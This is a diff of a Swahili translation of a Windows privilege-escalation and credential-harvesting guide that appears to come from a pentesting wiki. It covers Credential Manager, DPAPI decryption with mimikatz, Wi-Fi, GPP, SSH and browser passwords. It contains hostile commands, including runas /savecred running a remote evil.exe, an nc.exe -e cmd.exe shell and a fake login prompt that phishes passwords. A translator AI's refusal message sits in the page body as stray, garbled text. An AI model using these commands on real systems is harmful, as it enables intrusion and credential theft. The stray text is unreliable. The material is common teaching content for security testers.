@@ -692,33 +700,33 @@ Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIn arp -A Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L ``` -### Kanuni za Firewall +### Firewall Rules -[**Check this page for Firewall related commands**](../basic-cmd-for-pentesters.md#firewall) **(orodhesha kanuni, unda kanuni, zima, zima...)** +[**Angalia ukurasa huu kwa amri zinazohusiana na Firewall**](../basic-cmd-for-pentesters.md#firewall) **(orodhesha rules, unda rules, zima, zima...)** -Zaidi[ commands for network enumeration here](../basic-cmd-for-pentesters.md#network) +Zaidi[ amri za network enumeration hapa](../basic-cmd-for-pentesters.md#network) ### Windows Subsystem for Linux (wsl) ```bash C:\Windows\System32\bash.exe C:\Windows\System32\wsl.exe ``` -Binari `bash.exe` pia inaweza kupatikana katika `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` +Binary `bash.exe` inaweza pia kupatikana katika `C:\Windows\WinSxS\amd64_microsoft-windows-lxssbash_[...]\bash.exe` -Ikiwa unapata root user unaweza kusikiliza kwenye bandari yoyote (wakati wa kwanza utakapotumia `nc.exe` kusikiliza kwenye bandari itakuuliza kupitia GUI kama `nc` inapaswa kuruhusiwa na firewall). +Ikiwa unapata root user unaweza kusikiliza kwenye port yoyote (mara ya kwanza unapotumia `nc.exe` kusikiliza kwenye port itakuuliza kupitia GUI ikiwa `nc` inapaswa kuruhusiwa na firewall). 
```bash wsl whoami ./ubuntun1604.exe config --default-user root wsl whoami wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE' ``` -Ili kuanzisha bash kama root kwa urahisi, unaweza kujaribu `--default-user root` +Ili kuanza bash kama root kwa urahisi, unaweza kujaribu `--default-user root` -Unaweza kuchunguza filesystem ya `WSL` katika folda `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` +Unaweza kuchunguza mfumo wa faili wa `WSL` katika folda `C:\Users\%USERNAME%\AppData\Local\Packages\CanonicalGroupLimited.UbuntuonWindows_79rhkp1fndgsc\LocalState\rootfs\` -## Vyeti vya Windows +## Uthibitisho wa Windows -### Vyeti vya Winlogon +### Winlogon Uthibitisho ```bash reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr /i "DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername" 
@@ -730,16 +738,16 @@ reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDef reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultUserName reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AltDefaultPassword ``` -### Msimamizi wa credentials / Windows Vault +### Meneja wa Credentials / Windows Vault -Kutoka [https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault](https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault)\ -Windows Vault inahifadhi credentials za watumiaji kwa seva, tovuti na programu nyingine ambazo **Windows** inaweza **kuingia kwa watumiaji moja kwa moja**. Kwa mwonekano wa kwanza, inaweza kuonekana kwamba watumiaji wanaweza kuhifadhi Facebook credentials, Twitter credentials, Gmail credentials n.k., ili kuingia moja kwa moja kupitia browsers. Lakini si hivyo. +Kutoka [https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault](https://www.neowin.net/news/windows-7-exploring-credential-manager-and-windows-vault)\ +Windows Vault huhifadhi sifa za watumiaji kwa seva, tovuti na programu nyingine ambazo **Windows** inaweza **kuingia kwa watumiaji kiotomatiki**y. Kwa mwanzo, inaweza kuonekana kwamba watumiaji wanaweza kuhifadhi sifa zao za Facebook, Twitter, Gmail n.k., ili wajingie moja kwa moja kupitia vivinjari. Lakini sivyo. -Windows Vault inahifadhi credentials ambazo Windows inaweza kuzitumia kuingia kwa watumiaji moja kwa moja, ambayo ina maana kwamba programu yoyote ya **programu za Windows zinazohitaji credentials kupata rasilimali** (server au tovuti) **zinaweza kutumia Credential Manager** & Windows Vault na kutumia credentials zilizotolewa badala ya watumiaji kuandika username na password kila wakati. 
+Windows Vault huhifadhi sifa ambazo Windows inaweza kuingia kwa watumiaji kiotomatiki, ambayo inamaanisha kwamba programu yoyote ya **Windows inayohitaji sifa ili kufikia rasilimali** (seva au tovuti) **inaweza kutumia Credential Manager** & Windows Vault na kutumia sifa zilizotolewa badala ya watumiaji kuingiza jina la mtumiaji na nywila kila mara. -Isipokuwa programu zinavyoshirikiana na Credential Manager, sipati kuwa zinaweza kutumia credentials za rasilimali fulani. Kwa hivyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa namna fulani **wasiliane na Credential Manager na kuomba credentials za rasilimali hiyo** kutoka kwa vault ya hifadhi ya chaguo-msingi. +Isipokuwa programu hizo zinashirikiana na Credential Manager, sidhani kwamba zinaweza kutumia sifa za rasilimali fulani. Kwa hiyo, ikiwa programu yako inataka kutumia vault, inapaswa kwa namna fulani **kuwasiliana na credential manager na kuomba sifa za rasilimali hiyo** kutoka kwenye vault ya uhifadhi ya chaguo-msingi. -Tumia `cmdkey` ili kuorodhesha credentials zilizohifadhiwa kwenye mashine. +Tumia `cmdkey` kuorodhesha sifa zilizohifadhiwa kwenye mashine. ```bash cmdkey /list Currently stored credentials: @@ -747,11 +755,11 @@ Target: Domain:interactive=WORKGROUP\Administrator Type: Domain Password User: WORKGROUP\Administrator ``` -Kisha unaweza kutumia `runas` kwa chaguo la `/savecred` ili kutumia saved credentials. Mfano ufuatao unaitisha remote binary kupitia SMB share. +Kisha unaweza kutumia `runas` kwa chaguo la `/savecred` ili kutumia sifa zilizohifadhiwa. Mfano ufuatao unaitisha binary ya mbali kupitia SMB share. ```bash runas /savecred /user:WORKGROUP\Administrator "\\10.XXX.XXX.XXX\SHARE\evil.exe" ``` -Kutumia `runas` na seti ya taarifa za uthibitisho iliyotolewa. +Kutumia `runas` na seti ya credential iliyotolewa. ```bash C:\Windows\System32\runas.exe /env /noprofile /user: "c:\users\Public\nc.exe -nc 4444 -e cmd.exe" ``` 
@@ -759,37 +767,37 @@ Kumbuka kwamba mimikatz, lazagne, [credentialfileview](https://www.nirsoft.net/u ### DPAPI -The **Data Protection API (DPAPI)** inatoa njia ya ufichaji wa data kwa kutumia ufunguo wa simetriki, unatumiwa hasa ndani ya mfumo wa uendeshaji wa Windows kwa ajili ya ufichaji wa ufunguo binafsi wa asymmetric. Ufungaji huu unategemea siri ya mtumiaji au ya mfumo ili kuchangia kwa kiasi kikubwa entropia. +The **Data Protection API (DPAPI)** inatoa njia ya usimbaji wa simetriki wa data, inayotumika hasa ndani ya mfumo wa uendeshaji wa Windows kwa ajili ya usimbaji wa simetriki wa funguo binafsi za asymmetric. Usimbaji huu unatumia siri ya mtumiaji au mfumo ili kuchangia kwa kiasi kikubwa entropia. -**DPAPI inawezesha ufichaji wa funguo kupitia ufunguo wa simetriki unaotokana na siri za kuingia (login) za mtumiaji**. Katika matukio yanayohusisha ufichaji wa mfumo, inatumia siri za uthibitishaji za domain ya mfumo. +**DPAPI inaruhusu usimbaji wa funguo kupitia ufunguo wa simetriki unaotokana na siri za kuingia za mtumiaji**. Katika hali za usimbaji za mfumo, inatumia siri za uthibitishaji za domain ya mfumo. -Ufunguo wa RSA wa mtumiaji uliofichwa kwa kutumia DPAPI huhifadhiwa katika saraka %APPDATA%\Microsoft\Protect\{SID}, ambapo {SID} inaashiria [Security Identifier](https://en.wikipedia.org/wiki/Security_Identifier) ya mtumiaji. **Funguao la DPAPI, linaloshirikiwa na ufunguo mkuu unaolinda funguo binafsi za mtumiaji katika faili hiyo hiyo**, kwa kawaida linajumuisha 64 bytes za data za nasibu. (Ni muhimu kutambua kwamba ufikiaji wa saraka hii umewekewa vikwazo, ukizuia kuorodhesha yaliyomo kwa kutumia amri ya `dir` katika CMD, ingawa inaweza kuorodheshwa kupitia PowerShell). +Funguo za RSA za watumiaji zilizosimbwa kwa kutumia DPAPI huhifadhiwa kwenye kichunguzi `%APPDATA%\Microsoft\Protect\{SID}`, ambapo `{SID}` inawakilisha [Security Identifier](https://en.wikipedia.org/wiki/Security_Identifier) ya mtumiaji. 
**The DPAPI key, co-located with the master key that safeguards the user's private keys in the same file**, kwa kawaida inajumuisha 64 bytes za data za nasibu. (Ni muhimu kukumbuka kwamba upatikanaji wa saraka hii umezuiliwa, ukizuia kuorodhesha yaliyomo yake kwa kutumia amri ya `dir` katika CMD, ingawa inaweza kuorodheshwa kupitia PowerShell). ```bash Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\ Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect\ ``` -Unaweza kutumia **mimikatz module** `dpapi::masterkey` kwa hoja zinazofaa (`/pvk` au `/rpc`) ili kui-decrypt. +Unaweza kutumia **mimikatz module** `dpapi::masterkey` kwa hoja zinazofaa (`/pvk` au `/rpc`) ili kuifungua. -Kwa kawaida, **credentials files protected by the master password** ziko katika: +Mafaili ya **credentials yaliyolindwa na master password** kwa kawaida yanapatikana katika: ```bash dir C:\Users\username\AppData\Local\Microsoft\Credentials\ dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\ Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\ Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\ ``` -Unaweza kutumia **mimikatz module** `dpapi::cred` pamoja na `/masterkey` inayofaa ili ku-decrypt.\ -Unaweza **extract many DPAPI** **masterkeys** kutoka **memory** kwa kutumia module `sekurlsa::dpapi` (kama wewe ni root). +Unaweza kutumia **mimikatz module** `dpapi::cred` na `/masterkey` inayofaa ili decrypt.\ +Unaweza **extract many DPAPI** **masterkeys** kutoka **memory** kwa module ya `sekurlsa::dpapi` (ikiwa wewe ni root). {{#ref}} dpapi-extracting-passwords.md {{#endref}} -### PowerShell Credentials +### Vyeti vya PowerShell -**PowerShell credentials** mara nyingi hutumiwa kwa ajili ya **scripting** na automation tasks kama njia ya kuhifadhi encrypted credentials kwa urahisi. 
Credentials hizi zinalindwa kwa kutumia **DPAPI**, ambayo kwa kawaida ina maana kwamba zinaweza ku-decryptwa tu na mtumiaji yule yule kwenye kompyuta ile ile zilipotengenezwa. +Vyeti vya PowerShell mara nyingi hutumika kwa ajili ya uandishi wa script na kazi za otomatiki kama njia rahisi ya kuhifadhi vyeti vilivyosimbwa. Vyeti hivyo vinalindwa kwa kutumia DPAPI, ambayo kwa kawaida inamaanisha vinaweza kufunguliwa (ku-decrypt) tu na mtumiaji mmoja huo kwenye kompyuta ile ile ambako vilitengenezwa. -Ili **decrypt** PS credentials kutoka kwenye faili inayoiweka unaweza kufanya: +Ili **decrypt** PS credentials kutoka kwenye faili inayohifadhi, unaweza kufanya: ```bash PS C:\> $credential = Import-Clixml -Path 'C:\pass.xml' PS C:\> $credential.GetNetworkCredential().username @@ -800,7 +808,7 @@ PS C:\htb> $credential.GetNetworkCredential().password JustAPWD! ``` -### Wifi +### Mtandao wa Wi-Fi ```bash #List saved Wifi using netsh wlan show profile 
@@ -809,34 +817,34 @@ netsh wlan show profile key=clear #Oneliner to extract all wifi passwords cls & echo. & for /f "tokens=3,* delims=: " %a in ('netsh wlan show profiles ^| find "Profile "') do @echo off > nul & (netsh wlan show profiles name="%b" key=clear | findstr "SSID Cipher Content" | find /v "Number" & echo.) & @echo on* ``` -### Muunganisho za RDP zilizohifadhiwa +### Miunganisho ya RDP Zilizohifadhiwa -Unaweza kuzipata kwenye `HKEY_USERS\\Software\Microsoft\Terminal Server Client\Servers\`\ +Unaweza kuziona katika `HKEY_USERS\\Software\Microsoft\Terminal Server Client\Servers\`\ na katika `HKCU\Software\Microsoft\Terminal Server Client\Servers\` -### Amri zilizotekelezwa hivi karibuni +### Amri Zilizotumika Hivi Karibuni ``` HCU\\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU HKCU\\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU ``` -### **Meneja wa Cheo za Remote Desktop** +### **Meneja wa Cheti za Remote Desktop** ``` %localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings ``` -Tumia **Mimikatz** `dpapi::rdg` module na `/masterkey` inayofaa ili kuvunjua usimbuaji wa faili zozote za .rdg\ -Unaweza **kutoa masterkeys nyingi za DPAPI** kutoka kwenye kumbukumbu kwa kutumia Mimikatz `sekurlsa::dpapi` module +Tumia **Mimikatz** `dpapi::rdg` module pamoja na `/masterkey` inayofaa ili **decrypt any .rdg files**\ +Unaweza **extract many DPAPI masterkeys** kutoka kwenye kumbukumbu kwa kutumia Mimikatz `sekurlsa::dpapi` module ### Sticky Notes -Watu mara nyingi hutitumia app ya StickyNotes kwenye workstations za Windows **kuhifadhi nywila** na taarifa nyingine, bila kutambua kuwa ni faili ya database. Faili hii iko kwenye `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` na daima inastahili kutafutwa na kuchunguzwa. 
+Watu mara nyingi hutumia app ya StickyNotes kwenye workstations za Windows kuhifadhi **nywila** na taarifa nyingine, bila kutambua kuwa ni faili ya database. Faili hii iko kwenye `C:\Users\\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite` na daima inafaa kutafutwa na kuchunguzwa. ### AppCmd.exe -**Kumbuka kwamba ili kurejesha nywila kutoka AppCmd.exe unahitaji kuwa Administrator na kuendesha kwa kiwango cha High Integrity.**\ -**AppCmd.exe** iko katika saraka `%systemroot%\system32\inetsrv\`.\ -Iwapo faili hii ipo basi kuna uwezekano kwamba baadhi ya **credentials** zimetayarishwa na zinaweza **kurejeshwa**. +**Kumbuka kwamba ili ku-recover passwords kutoka AppCmd.exe unahitaji kuwa Administrator na kuendesha kwa High Integrity level.**\ +**AppCmd.exe** iko katika `%systemroot%\system32\inetsrv\` directory.\ +Kama faili hii ipo basi inawezekana kwamba baadhi ya **credentials** zimetangazwa na zinaweza ku-recovered. -Msimbo huu ulichukuliwa kutoka kwa [**PowerUP**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1): +Msimbo huu ulitolewa kutoka kwa [**PowerUP**](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1): ```bash function Get-ApplicationHost { $OrigError = $ErrorActionPreference 
@@ -916,14 +924,14 @@ $ErrorActionPreference = $OrigError ``` ### SCClient / SCCM -Kagua kama `C:\Windows\CCM\SCClient.exe` ipo.\ -Mafaili ya kusakinisha huendeshwa kwa **SYSTEM privileges**, nyingi zina udhaifu kwa **DLL Sideloading (Taarifa kutoka** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**).** +Angalia kama `C:\Windows\CCM\SCClient.exe` inapatikana .\ +Wasakinishaji huendeshwa kwa **SYSTEM privileges**, wengi wao wana udhaifu kwa **DLL Sideloading (Taarifa kutoka** [**https://github.com/enjoiz/Privesc**](https://github.com/enjoiz/Privesc)**).** ```bash $result = Get-WmiObject -Namespace "root\ccm\clientSDK" -Class CCM_Application -Property * | select Name,SoftwareVersion if ($result) { $result } else { Write "Not Installed." } ``` -## Faili na Registry (Credentials) +## Mafaili na Registry (Credentials) ### Putty Creds ```bash 
@@ -933,23 +941,23 @@ reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s | findstr "HKEY_CURRENT_ ``` reg query HKCU\Software\SimonTatham\PuTTY\SshHostKeys\ ``` -### SSH keys in registry +### SSH keys katika rejista -SSH private keys zinaweza kuhifadhiwa ndani ya funguo ya registry `HKCU\Software\OpenSSH\Agent\Keys`, kwa hivyo unapaswa kuangalia kama kuna kitu chochote cha kuvutia huko: +SSH private keys zinaweza kuhifadhiwa ndani ya registry key `HKCU\Software\OpenSSH\Agent\Keys`, kwa hivyo unapaswa kuangalia kama kuna chochote cha kuvutia hapo: ```bash reg query 'HKEY_CURRENT_USER\Software\OpenSSH\Agent\Keys' ``` -Kama utapata rekodi yoyote ndani ya njia hiyo, kuna uwezekano ni SSH key iliyohifadhiwa. Imehifadhiwa encrypted lakini inaweza kufunguliwa kwa urahisi (decrypted) kwa kutumia [https://github.com/ropnop/windows_sshagent_extract](https://github.com/ropnop/windows_sshagent_extract).\ -More information about this technique here: [https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/) +Ikiwa utapata ingizo lolote ndani ya njia hiyo, huenda ni ufunguo wa SSH uliohifadhiwa. Imehifadhiwa kwa usimbaji, lakini inaweza kufunguliwa kwa urahisi kwa kutumia [https://github.com/ropnop/windows_sshagent_extract](https://github.com/ropnop/windows_sshagent_extract).\ +Taarifa zaidi kuhusu mbinu hii hapa: [https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/) -Kama `ssh-agent` service haifanyi kazi na unataka ianze moja kwa moja wakati wa boot, endesha: +Ikiwa huduma ya `ssh-agent` haifanyi kazi na ungependa ianze kiotomatiki wakati wa boot, endesha: ```bash Get-Service ssh-agent | Set-Service -StartupType Automatic -PassThru | Start-Service ``` > [!TIP] -> Inaonekana mbinu hii haitumiki tena. 
Nilijaribu kuunda ssh keys, kuziweka kwa `ssh-add` na kuingia kwa ssh kwenye mashine. Rejista HKCU\Software\OpenSSH\Agent\Keys haipo na procmon haikutambua matumizi ya `dpapi.dll` wakati wa asymmetric key authentication. +> Inaonekana mbinu hii haifanyi kazi tena. Nilijaribu kuunda baadhi ya ssh keys, kuziweka kwa `ssh-add` na kuingia kwa ssh kwenye mashine. Rejista HKCU\Software\OpenSSH\Agent\Keys haipo na procmon haikutambua matumizi ya `dpapi.dll` wakati wa uthibitishaji wa funguo asimetri. -### Faili zisizohudumiwa +### Faili zilizoachwa ``` C:\Windows\sysprep\sysprep.xml C:\Windows\sysprep\sysprep.inf @@ -966,7 +974,7 @@ dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>n ``` Unaweza pia kutafuta faili hizi kwa kutumia **metasploit**: _post/windows/gather/enum_unattend_ -Mfano wa yaliyomo: +Mfano wa maudhui: ```xml @@ -985,7 +993,7 @@ Mfano wa yaliyomo: ``` -### SAM & SYSTEM chelezo +### Chelezo za SAM & SYSTEM ```bash # Usually %SYSTEMROOT% = C:\Windows %SYSTEMROOT%\repair\SAM @@ -995,7 +1003,7 @@ Mfano wa yaliyomo: %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system ``` -### Vyeti vya Wingu +### Vyeti za Cloud ```bash #From user home .aws\credentials 
@@ -1007,15 +1015,15 @@ AppData\Roaming\gcloud\access_tokens.db ``` ### McAfee SiteList.xml -Tafuta faili liitwalo **SiteList.xml** +Tafuta faili inayoitwa **SiteList.xml** -### Nenosiri la GPP lililohifadhiwa +### Nywila ya GPP iliyohifadhiwa -Kipengele kilikuwa kimepatikana hapo awali kilichoruhusu ugawaji wa akaunti za msimamizi wa eneo zilizoundwa maalum kwenye kundi la mashine kupitia Group Policy Preferences (GPP). Hata hivyo, njia hii ilikuwa na mapungufu makubwa ya usalama. Kwanza, Group Policy Objects (GPOs), zilizohifadhiwa kama faili za XML ndani ya SYSVOL, zingeweza kufikiwa na mtumiaji yeyote wa domain. Pili, nywila ndani ya GPP hizi, zilizofichwa kwa AES256 kwa kutumia default key iliyotambulishwa kwa umma, zingeweza ku-decrypt na mtumiaji yeyote aliyethibitishwa. Hii ilisababisha hatari kubwa, kwani ilingeweza kumruhusu mtumiaji kupata vigezo vya juu. +Kipengele kilikuwa kinapatikana hapo awali kilichoruhusu uenezaji wa akaunti za msimamizi wa kienyeji zilizobinafsishwa kwenye kundi la mashine kupitia Group Policy Preferences (GPP). Walakini, njia hii ilipata kasoro kubwa za usalama. Kwanza, Group Policy Objects (GPOs), zilizohifadhiwa kama faili za XML katika SYSVOL, zilikuwa zinaweza kufikiwa na mtumiaji yeyote wa domain. Pili, nywila ndani ya GPP hizi, zilizofichwa kwa AES256 kwa kutumia default key iliyo wazi katika nyaraka, zingeweza kufunguliwa (decrypted) na mtumiaji yeyote aliyethibitishwa. Hii ilikuwa hatari kubwa, kwani inaweza kuruhusu watumiaji kupata uwezo uliopanuliwa. -Ili kupunguza hatari hii, ilitengenezwa function inayotafuta faili za GPP zilizohifadhiwa ndani zinazo na uwanja "cpassword" ambao si tupu. Baada ya kupata faili kama hiyo, function hu-decrypt nenosiri na hurudisha PowerShell object maalum. Object hii inajumuisha maelezo kuhusu GPP na eneo la faili, ikisaidia katika utambuzi na utatuzi wa udhaifu huu wa usalama. 
+Ili kupunguza hatari hii, ilitengenezwa function inayosaka faili za GPP zilizohifadhiwa mahali hapa zilizo na field ya "cpassword" ambayo si tupu. Ikiwa faili kama hilo linapatikana, function huifungua nywila (decrypt) na kurudisha custom PowerShell object. Object hii inajumuisha taarifa kuhusu GPP na eneo la faili, kusaidia kutambua na kurekebisha udhaifu huu wa usalama. -Tafuta katika `C:\ProgramData\Microsoft\Group Policy\history` au katika _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (kabla ya Windows Vista)_ kwa faili hizi: +Tafuta katika `C:\ProgramData\Microsoft\Group Policy\history` au katika _**C:\Documents and Settings\All Users\Application Data\Microsoft\Group Policy\history** (previous to W Vista)_ kwa faili hizi: - Groups.xml - Services.xml @@ -1029,11 +1037,11 @@ Tafuta katika `C:\ProgramData\Microsoft\Group Policy\history` au katika _**C:\Do #To decrypt these passwords you can decrypt it using gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw ``` -Kutumia crackmapexec kupata nywila: +Kutumia crackmapexec kupata passwords: ```bash crackmapexec smb 10.10.10.10 -u username -p pwd -M gpp_autologin ``` -### IIS Usanidi wa Web +### Usanidi wa Web wa IIS ```bash Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue ``` @@ -1047,7 +1055,7 @@ C:\inetpub\wwwroot\web.config Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue Get-Childitem –Path C:\xampp\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue ``` -Mfano wa web.config yenye vitambulisho: +Mfano wa web.config yenye vifikisho: ```xml @@ -1057,7 +1065,7 @@ Mfano wa web.config yenye vitambulisho: ``` -### OpenVPN maelezo ya kuingia +### Nyaraka za kuingia za OpenVPN ```csharp Add-Type -AssemblyName System.Security $keys = Get-ChildItem "HKCU:\Software\OpenVPN-GUI\configs" 
@@ -1077,7 +1085,7 @@ $entropy, Write-Host ([System.Text.Encoding]::Unicode.GetString($decryptedbytes)) } ``` -### Faili za logi +### Logs ```bash # IIS C:\inetpub\logs\LogFiles\* @@ -1087,7 +1095,7 @@ Get-Childitem –Path C:\ -Include access.log,error.log -File -Recurse -ErrorAct ``` ### Omba credentials -Unaweza kila wakati **kumuuliza mtumiaji aingize credentials zake au hata credentials za mtumiaji mwingine** ikiwa unadhani anaweza kuzijua (kumbuka kwamba **kuuliza** mtumiaji moja kwa moja kwa **credentials** ni hatari sana): +Unaweza daima **kumuomba mtumiaji aingize credentials zake au hata credentials za mtumiaji mwingine** ikiwa unadhani anaweza kuwa anazijua (kumbuka kwamba **kumuuliza** mteja moja kwa moja kuhusu **credentials** ni hatari sana): ```bash $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+[Environment]::UserName,[Environment]::UserDomainName); $cred.getnetworkcredential().password $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName+'\'+'anotherusername',[Environment]::UserDomainName); $cred.getnetworkcredential().password @@ -1095,9 +1103,9 @@ $cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::U #Get plaintext $cred.GetNetworkCredential() | fl ``` -### **Majina ya faili yanayoweza kuwa na vitambulisho** +### **Majina ya faili yanayoweza kuwa na credentials** -Faili zinazojulikana ambazo muda fulani uliopita ziliwahi kuwa na **nywila** katika **maandishi wazi** au **Base64** +Faili zilizojulikana ambazo hapo awali ziliwamo **passwords** kwa **clear-text** au **Base64** ```bash $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history vnc.ini, ultravnc.ini, *vnc* 
@@ -1161,21 +1169,7 @@ TypedURLs #IE %USERPROFILE%\ntuser.dat %USERPROFILE%\LocalS~1\Tempor~1\Content.IE5\index.dat ``` -I don't have the files. Please either: - -- Paste the content of src/windows-hardening/windows-local-privilege-escalation/README.md (and any other files you want searched), or -- Give me a list of the "proposed files" you want searched, or -- Grant a link or repo path I can access. - -If you're working locally, you can list/search files with these commands (run in your repo root): - -- List files in that folder: - git ls-files "src/windows-hardening/windows-local-privilege-escalation/*" - -- Search for a term across those files: - git grep -n "SEARCH_TERM" -- src/windows-hardening/windows-local-privilege-escalation/ - -Once you provide the files or confirm which ones, I'll translate the relevant English text to Swahili, preserving markdown/html/tags/paths exactly as you specified. +Sina yaliyomo ya faili ulioorezea. Tafadhali tuma yaliyomo ya faili au orodha ya paths (mfano: src/windows-hardening/windows-local-privilege-escalation/README.md na faili zingine) ili niweze kutafuta na kutafsiri maandishi yanayohusika kwenda Kiswahili. 
``` cd C:\ dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd == .gitconfig == .git-credentials == Dockerfile == docker-compose.yml == access_tokens.db == accessTokens.json == azureProfile.json == appcmd.exe == scclient.exe == *.gpg$ == *.pgp$ == *config*.php == elasticsearch.y*ml == kibana.y*ml == *.p12$ == *.cer$ == known_hosts == *id_rsa* == *id_dsa* == *.ovpn == tomcat-users.xml == web.config == *.kdbx == KeePass.config == Ntds.dit == SAM == SYSTEM == security == software == FreeSSHDservice.ini == sysprep.inf == sysprep.xml == *vnc*.ini == *vnc*.c*nf* == *vnc*.txt == *vnc*.xml == php.ini == https.conf == https-xampp.conf == my.ini == my.cnf == access.log == error.log == server.xml == ConsoleHost_history.txt == pagefile.sys == NetSetup.log == iis6.log == AppEvent.Evt == SecEvent.Evt == default.sav == security.sav == software.sav == system.sav == ntuser.dat == index.dat == bash.exe == wsl.exe 2>nul | findstr /v ".dll" 
@@ -1184,15 +1178,15 @@ dir /s/b /A:-D RDCMan.settings == *.rdg == *_history* == httpd.conf == .htpasswd ``` Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")} ``` -### Vyeti katika RecycleBin +### Credentials katika RecycleBin -Pia unapaswa kuangalia Bin kutafuta vyeti ndani yake +Unapaswa pia kuangalia Bin kutafuta credentials ndani yake -Ili kufufua nywila zilizohifadhiwa na programu kadhaa unaweza kutumia: [http://www.nirsoft.net/password_recovery_tools.html](http://www.nirsoft.net/password_recovery_tools.html) +Ili **recover passwords** zilizohifadhiwa na programu kadhaa unaweza kutumia: [http://www.nirsoft.net/password_recovery_tools.html](http://www.nirsoft.net/password_recovery_tools.html) -### Ndani ya rejista +### Ndani ya registry -**Vifunguo vingine vya rejista vinavyowezekana vyenye vyeti** +**Vifunguo vingine vya registry vinavyoweza kuwa na credentials** ```bash reg query "HKCU\Software\ORL\WinVNC3\Password" reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s @@ -1201,12 +1195,12 @@ reg query "HKCU\Software\OpenSSH\Agent\Key" ``` [**Extract openssh keys from registry.**](https://blog.ropnop.com/extracting-ssh-private-keys-from-windows-10-ssh-agent/) -### Historia ya Vivinjari +### Browsers History -Unapaswa kuangalia dbs ambazo zinaweka nywila kutoka **Chrome or Firefox**.\ -Pia angalia historia, bookmarks na favourites za vivinjari kwani huenda baadhi ya **nywila** zimehifadhiwa pale. +Unapaswa kutafuta dbs ambapo password kutoka **Chrome or Firefox** zinahifadhiwa.\ +Pia angalia history, bookmarks na favourites za browsers kwani labda baadhi ya **passwords are** zimehifadhiwa hapo. -Zana za kutoa nywila kutoka kwenye vivinjari: +Tools to extract passwords from browsers: - Mimikatz: `dpapi::chrome` - [**SharpWeb**](https://github.com/djhohnstein/SharpWeb) 
@@ -1215,38 +1209,38 @@ Zana za kutoa nywila kutoka kwenye vivinjari: ### **COM DLL Overwriting** -**Component Object Model (COM)** ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows inayoruhusu kuwasiliana kati ya vipengele vya programu vilivyoandikwa kwa lugha tofauti. Kila sehemu ya COM inatambulishwa kwa class ID (CLSID) na kila sehemu huonyesha utendakazi kupitia interface moja au zaidi, zinazotambulishwa kwa interface IDs (IIDs). +**Component Object Model (COM)** ni teknolojia iliyojengwa ndani ya mfumo wa uendeshaji wa Windows inayoruhusu **intercommunication** kati ya vipengele vya programu vinavyotumika kwa lugha tofauti. Kila sehemu ya COM inatambulika kupitia class ID (CLSID) na kila sehemu inafunua uwezo kupitia moja au zaidi ya interfaces, zinazo tambulika kupitia interface IDs (IIDs). -COM classes and interfaces zimefafanuliwa katika registry chini ya **HKEY\CLASSES\ROOT\CLSID** na **HKEY\CLASSES\ROOT\Interface** mtawalia. Registry hii imeundwa kwa kuchanganya **HKEY\LOCAL\MACHINE\Software\Classes** + **HKEY\CURRENT\USER\Software\Classes** = **HKEY\CLASSES\ROOT.** +COM classes na interfaces zimefafanuliwa kwenye registry chini ya **HKEY\CLASSES\ROOT\CLSID** na 